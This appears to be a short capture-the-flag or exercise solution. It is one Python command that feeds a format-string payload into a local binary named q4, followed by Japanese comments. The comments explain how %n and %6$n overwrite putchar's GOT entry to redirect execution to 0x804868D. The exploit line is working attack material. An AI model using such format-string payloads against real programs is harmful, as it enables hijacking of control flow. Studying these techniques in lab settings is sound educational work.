python -c "print '\xe0\x99\x04\x08%134514317c%6\$n'" | ./q4
# %nは出力した文字数をprintfの引数で指定した変数に書き込む書式
# 先頭4バイトが書き込み先アドレス
# 134514317+4が実際に書き込まれる値
# %6$nを指定すると、スタックの6番目の変数内のアドレスが書き込み先となる
#   →先頭4バイトの指定がGOT領域のputcharのアドレスが格納されているアドレスになっているため、
#   putcharを呼び出したときに134514317(0x804868D)にジャンプする
